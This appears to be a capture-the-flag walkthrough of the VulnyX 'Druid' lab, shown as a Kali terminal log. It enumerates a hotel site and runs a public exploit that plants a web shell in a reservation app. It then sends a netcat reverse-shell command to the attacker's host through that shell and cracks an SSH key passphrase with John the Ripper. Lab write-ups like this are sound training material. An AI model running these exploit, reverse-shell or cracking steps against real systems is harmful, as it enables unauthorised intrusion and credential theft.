靶场练习-vulnyx：Druid

┌──(root㉿kali)-[~]

└─# whatweb http://192.168.1.128      

http://192.168.1.128 [200 OK] Apache[2.4.56], Bootstrap, Country[RESERVED][ZZ], Email[[email protected]], HTML5, HTTPServer[Debian Linux][Apache/2.4.56 (Debian)], IP[192.168.1.128], JQuery[3.3.1], Script, Title[Hotel], X-UA-Compatible[IE=edge]

┌──(root㉿kali)-[~]

└─# gobuster vhost -u http://hotel.nyx -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 --exclude-length 301 --append-domain

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:              http://hotel.nyx

[+] Method:           GET

[+] Threads:          100

[+] Wordlist:         /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

[+] User Agent:       gobuster/3.6

[+] Timeout:          10s

[+] Append Domain:    true

[+] Exclude Length:   301

===============================================================

Starting gobuster in VHOST enumeration mode

===============================================================

Found: reservations.hotel.nyx Status: 200 [Size: 398]

┌──(root㉿kali)-[~]

└─# python 50754.py -t http://reservations.hotel.nyx/ --noauth 

 /$$   /$$             /$$               /$$       /$$$$$$$                      /$$       /$$

| $$  | $$            | $$              | $$      | $$__  $$                    |__/      | $$

| $$  | $$  /$$$$$$  /$$$$$$    /$$$$$$ | $$      | $$  \ $$  /$$$$$$  /$$   /$$ /$$  /$$$$$$$

| $$$$$$$$ /$$__  $$|_  $$_/   /$$__  $$| $$      | $$  | $$ /$$__  $$| $$  | $$| $$ /$$__  $$

| $$__  $$| $$  \ $$  | $$    | $$$$$$$$| $$      | $$  | $$| $$  \__/| $$  | $$| $$| $$  | $$

| $$  | $$| $$  | $$  | $$ /$$| $$_____/| $$      | $$  | $$| $$      | $$  | $$| $$| $$  | $$

| $$  | $$|  $$$$$$/  |  $$$$/|  $$$$$$$| $$      | $$$$$$$/| $$      |  $$$$$$/| $$|  $$$$$$$

|__/  |__/ \______/    \___/   \_______/|__/      |_______/ |__/       \______/ |__/ \_______/

Exploit By - 0z09e (https://twitter.com/0z09e)

[*] Trying to access the Dashboard.

[*] Checking the privilege of the user.

[+] User has the privilege to add room.

[*] Adding a new room.

[+] Room has been added successfully.

[*] Testing code exection

[+] Code executed successfully, Go to http://reservations.hotel.nyx/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.

[+] Example : http://reservations.hotel.nyx/dati/selectappartamenti.php?cmd=id

[+] Example Output : uid=33(www-data) gid=33(www-data) groups=33(www-data)

┌──(root㉿kali)-[~]

└─# curl http://reservations.hotel.nyx/dati/selectappartamenti.php?cmd=nc%20192.168.1.129%204444%20-e%20/bin/bash

┌──(root㉿kali)-[~]

└─# ssh2john id_rsa > id_rsa.hash

┌──(root㉿kali)-[~]

└─# john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8

Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])

Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes

Cost 2 (iteration count) is 2 for all loaded hashes

Will run 4 OpenMP threads

Press 'q' or Ctrl-C to abort, almost any other key for status

super1           (id_rsa)     

1g 0:00:00:00 DONE (2024-05-21 23:07) 33.33g/s 166400p/s 166400c/s 166400C/s jimmie..david123

Use the "--show" option to display all of the cracked passwords reliably

Session completed.